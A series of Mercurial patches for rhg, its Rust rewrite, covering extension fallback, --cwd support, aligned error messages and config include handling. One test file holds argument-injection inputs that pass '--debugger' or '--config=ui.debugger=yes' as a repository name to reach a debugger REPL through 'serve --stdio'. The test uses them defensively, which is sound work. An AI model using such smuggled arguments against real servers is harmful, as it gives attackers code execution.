} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614851923 -3600 # Thu Mar 04 10:58:43 2021 +0100 # Node ID 1bac7764ceef562b66801c0d5a19d3b0f50cb940 # Parent 60fe9ebae29bc89646a50d7ef458fbe04f93e161 rhg: Fall back to Python if unsupported extensions are enabled Extensions might affect behavior in ways we can’t anticipate, so just ignoring them is not correct. Later we’ll add opt-in configuration to ignore specific extensions. Differential Revision: https://phab.mercurial-scm.org/D10112 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,9 +286,9 @@ [[package]] name = "format-bytes" -version = "0.2.0" +version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" +checksum = "8030ff4b04f0ca1c612d6fe49f2fc18caf56fb01497cb370b41cfd36d89b3b06" dependencies = [ "format-bytes-macros", "proc-macro-hack", diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -14,6 +14,7 @@ }; use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; +use std::collections::HashSet; use std::env; use std::path::{Path, PathBuf}; use std::str; @@ -361,6 +362,14 @@ None } + /// Return all keys defined for the given section + pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> { + self.layers + .iter() + .flat_map(|layer| layer.iter_keys(section)) + .collect() + } + /// Get raw values bytes from all layers (even untrusted ones) in order /// of precedence. #[cfg(test)] diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -115,6 +115,14 @@ Some(self.sections.get(section)?.get(item)?) 
} + /// Returns the keys defined in the given section + pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> { + self.sections + .get(section) + .into_iter() + .flat_map(|section| section.keys().map(|vec| &**vec)) + } + pub fn is_empty(&self) -> bool { self.sections.is_empty() } diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -17,5 +17,5 @@ micro-timer = "0.3.1" regex = "1.3.9" env_logger = "0.7.1" -format-bytes = "0.2.0" +format-bytes = "0.2.1" users = "0.11.0" diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -4,7 +4,7 @@ use clap::AppSettings; use clap::Arg; use clap::ArgMatches; -use format_bytes::format_bytes; +use format_bytes::{format_bytes, join}; use hg::config::Config; use hg::repo::{Repo, RepoError}; use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; @@ -25,6 +25,8 @@ repo: Result<&Repo, &NoRepoInCwdError>, config: &Config, ) -> Result<(), CommandError> { + check_extensions(config)?; + let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) @@ -352,3 +354,25 @@ } } } + +const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"]; + +fn check_extensions(config: &Config) -> Result<(), CommandError> { + let enabled = config.get_section_keys(b"extensions"); + + let mut unsupported = enabled; + for supported in SUPPORTED_EXTENSIONS { + unsupported.remove(supported); + } + + if unsupported.is_empty() { + Ok(()) + } else { + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"extensions: {}", + join(unsupported, b", ") + ), + }) + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615585120 -3600 # Fri Mar 12 22:38:40 2021 +0100 # Node ID 1a036d33bc1896d86c6bdb2b3bd832fff3cfd8bf # Parent 1bac7764ceef562b66801c0d5a19d3b0f50cb940 rhg: Add an allow-list of ignored extensions Because rhg doesn’t know 
how a Python extension would affect behavior it implements in Rust, when an unsupported extension is enabled it conservatively falls back to Python-based hg. However many users will have unsupported extensions enabled in practice. Maybe they don’t actually affect rhg behavior, but we don’t know. This adds a `rhg.ignored-extensions` configuration that lets users list extensions that rhg can safely ignore and proceed even if they’re not supported in Rust. Differential Revision: https://phab.mercurial-scm.org/D10188 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -13,6 +13,7 @@ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; use crate::utils::files::get_bytes_from_os_str; +use crate::utils::SliceExt; use format_bytes::{write_bytes, DisplayBytes}; use std::collections::HashSet; use std::env; @@ -339,6 +340,31 @@ Ok(self.get_option(section, item)?.unwrap_or(false)) } + /// Returns the corresponding list-value in the config if found, or `None`. + /// + /// This is appropriate for new configuration keys. The value syntax is + /// **not** the same as most existing list-valued config, which has Python + /// parsing implemented in `parselist()` in `mercurial/config.py`. + /// Faithfully porting that parsing algorithm to Rust (including behavior + /// that are arguably bugs) turned out to be non-trivial and hasn’t been + /// completed as of this writing. + /// + /// Instead, the "simple" syntax is: split on comma, then trim leading and + /// trailing whitespace of each component. Quotes or backslashes are not + /// interpreted in any way. Commas are mandatory between values. Values + /// that contain a comma are not supported. 
+ pub fn get_simple_list( + &self, + section: &[u8], + item: &[u8], + ) -> Option<impl Iterator<Item = &[u8]>> { + self.get(section, item).map(|value| { + value + .split(|&byte| byte == b',') + .map(|component| component.trim()) + }) + } + /// Returns the raw value bytes of the first one found, or `None`. pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> { self.get_inner(section, item) diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -365,12 +365,20 @@ unsupported.remove(supported); } + if let Some(ignored_list) = + config.get_simple_list(b"rhg", b"ignored-extensions") + { + for ignored in ignored_list { + unsupported.remove(ignored); + } + } + if unsupported.is_empty() { Ok(()) } else { Err(CommandError::UnsupportedFeature { message: format_bytes!( - b"extensions: {}", + b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)", join(unsupported, b", ") ), }) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614861020 -3600 # Thu Mar 04 13:30:20 2021 +0100 # Node ID 12d59eec7f1d50b5b1313de36e15689733a47ddb # Parent 1a036d33bc1896d86c6bdb2b3bd832fff3cfd8bf rhg: Align with Python on some more error messages Differences can cause some tests to fail Differential Revision: https://phab.mercurial-scm.org/D10133 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,9 +286,9 @@ [[package]] name = "format-bytes" -version = "0.2.1" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8030ff4b04f0ca1c612d6fe49f2fc18caf56fb01497cb370b41cfd36d89b3b06" +checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762" dependencies = [ "format-bytes-macros", "proc-macro-hack", diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -28,7 +28,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = 
"0.2.36" -format-bytes = "0.2.0" +format-bytes = "0.2.2" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the fastest. diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,7 +7,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::errors::{HgError, IoResultExt}; +use crate::errors::HgError; use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; @@ -74,7 +74,7 @@ layer.add(section, item, value, None); } else { Err(HgError::abort(format!( - "malformed --config option: '{}' \ + "abort: malformed --config option: '{}' \ (use --config section.name=value)", String::from_utf8_lossy(arg), )))? @@ -147,6 +147,7 @@ let mut section = b"".to_vec(); while let Some((index, bytes)) = lines_iter.next() { + let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; // `Path::parent` only fails for the root directory, @@ -158,8 +159,17 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = - std::fs::read(&filename).when_reading_file(&filename)?; + let data = std::fs::read(&filename).map_err(|io_error| { + ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(io_error) + ), + } + })?; layers.push(current_layer); layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); @@ -184,12 +194,7 @@ }; lines_iter.next(); } - current_layer.add( - section.clone(), - item, - value, - Some(index + 1), - ); 
+ current_layer.add(section.clone(), item, value, line); } else if let Some(m) = UNSET_RE.captures(&bytes) { if let Some(map) = current_layer.sections.get_mut(&section) { map.remove(&m[1]); @@ -202,7 +207,7 @@ }; return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), - line: Some(index + 1), + line, message, } .into()); diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -81,7 +81,7 @@ write!(f, "abort: {}: {}", context, error) } HgError::CorruptedRepository(explanation) => { - write!(f, "abort: corrupted repository: {}", explanation) + write!(f, "abort: {}", explanation) } HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -141,20 +141,22 @@ if share_safe && !source_is_share_safe { return Err(match config - .get(b"safe-mismatch", b"source-not-safe") + .get(b"share", b"safe-mismatch.source-not-safe") { Some(b"abort") | None => HgError::abort( - "share source does not support share-safe requirement", + "abort: share source does not support share-safe requirement\n\ + (see `hg help config.format.use-share-safe` for more information)", ), _ => HgError::unsupported("share-safe downgrade"), } .into()); } else if source_is_share_safe && !share_safe { return Err( - match config.get(b"safe-mismatch", b"source-safe") { + match config.get(b"share", b"safe-mismatch.source-safe") { Some(b"abort") | None => HgError::abort( - "version mismatch: source uses share-safe \ - functionality while the current share does not", + "abort: version mismatch: source uses share-safe \ + functionality while the current share does not\n\ + (see `hg help config.format.use-share-safe` for more information)", ), _ => HgError::unsupported("share-safe upgrade"), } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs ---
a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -72,7 +72,7 @@ match error { RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( - b"repository {} not found", + b"abort: repository {} not found", get_bytes_from_path(at) ), }, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -187,7 +187,7 @@ $ echo -e '\xFF' >> .hg/requires $ $NO_FALLBACK rhg debugrequirements - abort: corrupted repository: parse error in 'requires' file + abort: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614939675 -3600 # Fri Mar 05 11:21:15 2021 +0100 # Node ID 2255e7eb39e5ad8f0b538bff53ec04cec00c366b # Parent 12d59eec7f1d50b5b1313de36e15689733a47ddb rhg: Add support for --cwd This affect the meaning of relative paths in `--repository`, which are resolved "early" by rhg in order to load config which is needed before fallback to Python is considered. An incorrect path could cause errors when loading a non-existent repo, leading to failing tests even when fallback is enabled. 
Differential Revision: https://phab.mercurial-scm.org/D10134 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -53,6 +53,14 @@ // Not ok: `--config section.key1=val section.key2=val2` .number_of_values(1), ) + .arg( + Arg::with_name("cwd") + .help("change working directory") + .long("--cwd") + .value_name("DIR") + .takes_value(true) + .global(true), + ) .version("0.0.1"); let app = add_subcommand_args(app); @@ -87,6 +95,28 @@ let ui = ui::Ui::new(); let early_args = EarlyArgs::parse(std::env::args_os()); + + let initial_current_dir = early_args.cwd.map(|cwd| { + let cwd = get_path_from_bytes(&cwd); + std::env::current_dir() + .and_then(|initial| { + std::env::set_current_dir(cwd)?; + Ok(initial) + }) + .unwrap_or_else(|error| { + exit( + &None, + &ui, + OnUnsupported::Abort, + Err(CommandError::abort(format!( + "abort: {}: '{}'", + error, + cwd.display() + ))), + ) + }) + }); + let non_repo_config = Config::load(early_args.config).unwrap_or_else(|error| { // Normally this is decided based on config, but we don’t have that @@ -94,7 +124,7 @@ // "unsupported" error but that is not enforced by the type system. 
let on_unsupported = OnUnsupported::Abort; - exit(&ui, on_unsupported, Err(error.into())) + exit(&initial_current_dir, &ui, on_unsupported, Err(error.into())) }); if let Some(repo_path_bytes) = &early_args.repo { @@ -105,6 +135,7 @@ } if SCHEME_RE.is_match(&repo_path_bytes) { exit( + &initial_current_dir, &ui, OnUnsupported::from_config(&non_repo_config), Err(CommandError::UnsupportedFeature { @@ -124,6 +155,7 @@ Err(NoRepoInCwdError { cwd: at }) } Err(error) => exit( + &initial_current_dir, &ui, OnUnsupported::from_config(&non_repo_config), Err(error.into()), @@ -142,7 +174,12 @@ repo_result.as_ref(), config, ); - exit(&ui, OnUnsupported::from_config(config), result) + exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(config), + result, + ) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -159,6 +196,7 @@ } fn exit( + initial_current_dir: &Option<PathBuf>, ui: &Ui, mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, @@ -182,7 +220,12 @@ on_unsupported = OnUnsupported::Abort } else { // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` - let result = Command::new(executable_path).args(args).status(); + let mut command = Command::new(executable_path); + command.args(args); + if let Some(initial) = initial_current_dir { + command.current_dir(initial); + } + let result = command.status(); match result { Ok(status) => std::process::exit( status.code().unwrap_or(exitcode::ABORT), @@ -283,6 +326,8 @@ config: Vec<Vec<u8>>, /// Value of the `-R` or `--repository` argument, if any. repo: Option<Vec<u8>>, + /// Value of the `--cwd` argument, if any. + cwd: Option<Vec<u8>>, } impl EarlyArgs { @@ -290,6 +335,7 @@ let mut args = args.into_iter().map(get_bytes_from_os_str); let mut config = Vec::new(); let mut repo = None; + let mut cwd = None; // Use `while let` instead of `for` so that we can also call // `args.next()` inside the loop. 
while let Some(arg) = args.next() { @@ -301,6 +347,14 @@ config.push(value.to_owned()) } + if arg == b"--cwd" { + if let Some(value) = args.next() { + cwd = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--cwd=") { + cwd = Some(value.to_owned()) + } + if arg == b"--repository" || arg == b"-R" { if let Some(value) = args.next() { repo = Some(value) @@ -311,7 +365,7 @@ repo = Some(value.to_owned()) } } - Self { config, repo } + Self { config, repo, cwd } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614940761 -3600 # Fri Mar 05 11:39:21 2021 +0100 # Node ID e96a0a53de20700beacccb656617bceab78f639e # Parent 2255e7eb39e5ad8f0b538bff53ec04cec00c366b tests: Adapt expected output for minor differences with rhg Differential Revision: https://phab.mercurial-scm.org/D10135 diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -264,7 +264,7 @@ Testing --traceback: -#if no-chg +#if no-chg no-rhg $ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback' Traceback (most recent call last): Traceback (most recent call last): (py3 !) diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -59,7 +59,7 @@ #if unix-permissions no-root $ chmod u-r $TESTTMP/included $ hg showconfig section - config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied) + config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob) [255] #endif diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -390,6 +390,7 @@ abort: destination 'a repo' is not empty [10] +#if no-rhg Make sure hg is really paranoid in serve --stdio mode. It used to be possible to get a debugger REPL by specifying a repo named --debugger. 
$ hg -R --debugger serve --stdio @@ -402,6 +403,27 @@ $ hg -R narf serv --stdio abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] [255] +#else +rhg aborts early on -R without a repository at that path + $ hg -R --debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --debugger not found (known-bad-output !) + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --config=ui.debugger=yes not found (known-bad-output !) + [255] + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !) + abort: repository narf not found (known-bad-output !) + [255] +If the repo does exist, rhg finds an unsupported command and falls back to Python +which still does the right thing + $ hg init narf + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] +#endif Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615221142 -3600 # Mon Mar 08 17:32:22 2021 +0100 # Node ID b4ad45f2f648d0e85b6b59987d5972d233b79eb4 # Parent e96a0a53de20700beacccb656617bceab78f639e tests: clarify some missing output in test-merge-subrepos This makes the test behavior clearer, especially why the outputs are inconsistent. 
Differential Revision: https://phab.mercurial-scm.org/D10136 diff --git a/tests/test-merge-subrepos.t b/tests/test-merge-subrepos.t --- a/tests/test-merge-subrepos.t +++ b/tests/test-merge-subrepos.t @@ -117,10 +117,17 @@ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved XXX: There's a difference between wdir() and '.', so there should be a status. -`hg files -S` from the top is also missing 'subrepo/b'. +`hg files -S` from the top is also missing 'subrepo/b'. The files should be +seen as deleted (and, maybe even missing? in which case `hg files` should list +it) $ hg st -S + R subrepo/b (missing-correct-output !) $ hg st -R subrepo + R subrepo/b (missing-correct-output !) + +(note: return [1] because no files "match" since the list is empty) + $ hg files -R subrepo [1] $ hg files -R subrepo -r '.' # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614947329 -3600 # Fri Mar 05 13:28:49 2021 +0100 # Node ID c184b490da37d76b61852b77513964301df4fc8b # Parent b4ad45f2f648d0e85b6b59987d5972d233b79eb4 rhg: Fall back to Python if ui.relative-paths is configured This feature is not supported yet, and affects the output of some tests. 
Differential Revision: https://phab.mercurial-scm.org/D10137 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -27,6 +27,13 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let relative = invocation.config.get(b"ui", b"relative-paths"); + if relative.is_some() { + return Err(CommandError::unsupported( + "non-default ui.relative-paths", + )); + } + let rev = invocation.subcommand_args.value_of("rev"); let repo = invocation.repo?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615188943 -3600 # Mon Mar 08 08:35:43 2021 +0100 # Node ID 97ac588b6d9e146feb133b9588078d19a606dcdf # Parent c184b490da37d76b61852b77513964301df4fc8b rhg: Don’t make repository path absolute too early Some error messages want to include a relative path, which affects the output of some tests. Differential Revision: https://phab.mercurial-scm.org/D10138 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -50,6 +50,8 @@ from: std::path::PathBuf, to: std::path::PathBuf, }, + /// `std::fs::canonicalize` + CanonicalizingPath(std::path::PathBuf), /// `std::env::current_dir` CurrentDir, /// `std::env::current_exe` @@ -128,6 +130,9 @@ from.display(), to.display() ), + IoErrorContext::CanonicalizingPath(path) => { + write!(f, "when canonicalizing {}", path.display()) + } IoErrorContext::CurrentDir => { write!(f, "error getting current working directory") } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -2,7 +2,7 @@ use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; -use crate::utils::{current_dir, SliceExt}; +use crate::utils::SliceExt; use memmap::{Mmap, MmapOptions}; use 
std::collections::HashSet; use std::path::{Path, PathBuf}; @@ -56,12 +56,9 @@ explicit_path: Option<&Path>, ) -> Result<Self, RepoError> { if let Some(root) = explicit_path { - // Having an absolute path isn’t necessary here but can help code - // elsewhere - let absolute_root = current_dir()?.join(root); - if absolute_root.join(".hg").is_dir() { - Self::new_at_path(absolute_root, config) - } else if absolute_root.is_file() { + if root.join(".hg").is_dir() { + Self::new_at_path(root.to_owned(), config) + } else if root.is_file() { Err(HgError::unsupported("bundle repository").into()) } else { Err(RepoError::NotFound { diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -40,13 +40,15 @@ let repo = invocation.repo?; let cwd = hg::utils::current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute let mut files = vec![]; for file in file_args.iter() { // TODO: actually normalize `..` path segments etc? 
let normalized = cwd.join(&file); let stripped = normalized - .strip_prefix(&repo.working_directory_path()) + .strip_prefix(&working_directory) // TODO: error message for path arguments outside of the repo .map_err(|_| CommandError::abort(""))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -4,6 +4,7 @@ use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; +use hg::utils::current_dir; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -53,8 +54,10 @@ files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); + let working_directory = repo.working_directory_path(); + let working_directory = current_dir()?.join(working_directory); // Make it absolute let working_directory = - HgPathBuf::from(get_bytes_from_path(repo.working_directory_path())); + HgPathBuf::from(get_bytes_from_path(working_directory)); let mut stdout = ui.stdout_buffer(); diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use format_bytes::format_bytes; +use hg::errors::{IoErrorContext, IoResultExt}; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -14,7 +15,12 @@ pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { let repo = invocation.repo?; - let bytes = get_bytes_from_path(repo.working_directory_path()); + let working_directory = repo.working_directory_path(); + let working_directory = std::fs::canonicalize(working_directory) + .with_context(|| { + IoErrorContext::CanonicalizingPath(working_directory.to_owned()) + })?; + let bytes = 
get_bytes_from_path(&working_directory); invocation .ui .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615190148 -3600 # Mon Mar 08 08:55:48 2021 +0100 # Node ID 25e3dac511f066fd1991458b3be1e8bfe7c0f42c # Parent 97ac588b6d9e146feb133b9588078d19a606dcdf rhg: Add support for the HGRCSKIPREPO environment variable It’s easy enough and affects tests, well, that test that feature. Differential Revision: https://phab.mercurial-scm.org/D10139 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -24,6 +24,7 @@ /// Holds the config values for the current repository /// TODO update this docstring once we support more sources +#[derive(Clone)] pub struct Config { layers: Vec<layer::ConfigLayer>, } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -169,7 +169,11 @@ reqs.extend(requirements::load(Vfs { base: &store_path })?); } - let repo_config = config.combine_with_repo(&repo_config_files)?; + let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() { + config.combine_with_repo(&repo_config_files)? + } else { + config.clone() + }; let repo = Self { requirements: reqs, # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615214132 -3600 # Mon Mar 08 15:35:32 2021 +0100 # Node ID 91ab5190a3deaab1c1532d937eba9fc41361923c # Parent 25e3dac511f066fd1991458b3be1e8bfe7c0f42c rhg: Add support for environment variables in config include paths Some tests rely on this. 
Differential Revision: https://phab.mercurial-scm.org/D10140 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -150,6 +150,7 @@ let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; + let filename_bytes = crate::utils::expand_vars(filename_bytes); // `Path::parent` only fails for the root directory, // which `src` can’t be since we’ve managed to open it as a // file. diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -241,6 +241,59 @@ }) } +/// Expand `$FOO` and `${FOO}` environment variables in the given byte string +pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> { + lazy_static::lazy_static! { + /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301 + /// The `x` makes whitespace ignored. + /// `-u` disables the Unicode flag, which makes `\w` like Python with the ASCII flag. + static ref VAR_RE: regex::bytes::Regex = + regex::bytes::Regex::new(r"(?x-u) + \$ + (?: + (\w+) + | + \{ + ([^}]*) + \} + ) + ").unwrap(); + } + VAR_RE.replace_all(s, |captures: &regex::bytes::Captures| { + let var_name = files::get_os_str_from_bytes( + captures + .get(1) + .or_else(|| captures.get(2)) + .expect("either side of `|` must participate in match") + .as_bytes(), + ); + std::env::var_os(var_name) + .map(files::get_bytes_from_os_str) + .unwrap_or_else(|| { + // Referencing an environment variable that does not exist. + // Leave the $FOO reference as-is. + captures[0].to_owned() + }) + }) +} + +#[test] +fn test_expand_vars() { + // Modifying process-global state in a test isn’t great, + // but hopefully this won’t collide with anything. + std::env::set_var("TEST_EXPAND_VAR", "1"); + assert_eq!( + expand_vars(b"before/$TEST_EXPAND_VAR/after"), + &b"before/1/after"[..] 
+ ); + assert_eq!( + expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"), + &b"before111after"[..] + ); + let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after"; + assert_eq!(expand_vars(s), &s[..]); +} + pub(crate) enum MergeResult<V> { UseLeftValue, UseRightValue, diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -23,7 +23,7 @@ use std::ops::Deref; use std::path::{Path, PathBuf}; -pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { +pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr { let os_str; #[cfg(unix)] { @@ -33,8 +33,11 @@ // TODO Handle other platforms // TODO: convert from WTF8 to Windows MBCS (ANSI encoding). // Perhaps, the return type would have to be Result<PathBuf>. + os_str +} - Path::new(os_str) +pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { + Path::new(get_os_str_from_bytes(bytes)) } // TODO: need to convert from WTF8 to MBCS bytes on Windows. # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615226849 -3600 # Mon Mar 08 19:07:29 2021 +0100 # Node ID 84a3deca963a727919d84ca3c1acfa675eecd7d1 # Parent 91ab5190a3deaab1c1532d937eba9fc41361923c rhg: Silently ignore missing files in config %include … instead of aborting with an error message. This is what Python-based hg does. 
